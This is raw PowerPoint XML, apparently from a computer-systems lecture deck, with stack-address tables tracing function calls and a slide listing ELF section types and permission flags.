                                              <p:pRg st="45" end="45"/>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5"/>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7"/>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8"/>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9"/>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xit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>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6"/>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xit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>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 presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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8" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15"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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a: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151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="6295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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2e0</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0x804840e</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="357945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78564622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0xfd2e0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152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="6295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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2e0</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0x804840f</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="389995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27211994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0xfd2e0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153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="6295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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0x804840f</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="389995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52719753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0xfd2e0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154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="6295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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</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0x8048414</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="415448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88447222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0xfd2e0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155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="211328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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2c0</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</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0x8048414</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="415448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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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0xfd2c0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44283062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0xfd2e0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156</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="211328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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2c0</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</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0x8048417</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="4430532"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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62339348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0xfd2e0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r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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157</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="211328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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2c0</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</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0x8048417</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="4430532"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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59456726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0xfd2e0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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="211328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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2c0</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</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0x804841e</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="471520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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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65052932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0xfd2e0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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>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159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="247560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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2bc</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</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0x80483f4</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2" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="59806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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788098" y="230499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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="607185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382" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997383" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each section contains a header that specifies the type of section and the permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PROGBITS: Parts of the program, such as code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOBITS: Parts of the program that do not need space in the file, such as uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SYMTAB and DYNSYM: Symbol tables for static and dynamic linking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STRTAB: The string table used to match identifiers with symbols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REL and RELA: Sections that contain relocation information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The flag bits are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ALLOC: the section is allocated in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WRITE: the section is writable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXECINSTR: the section is executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24789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73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73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73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73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973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973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9738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9738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9738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973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0xfd2e0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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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0x8048423</a:t>
                      </a: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0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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160</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="284653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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2b8</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0x80483f4</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2" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="59806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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788098" y="230499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5" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788097" y="2653366"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12652563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0xfd2e0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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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0x8048423</a:t>
                      </a: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0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="284653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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2b8</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0xfd2d0</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0x80483f5</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2" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="86548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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788098" y="230499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5" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788097" y="2653366"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50758733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0xfd2e0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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="284653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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2b8</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0x80483f5</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2" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="86548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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788098" y="230499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5" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788097" y="2653366"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121531026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88246"/>
          <a:ext cx="2831284" cy="48768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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>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5"/>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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105743" y="218445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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="5110284"/>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0xfd2b8</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0x80483f7</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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="115015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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100270765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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
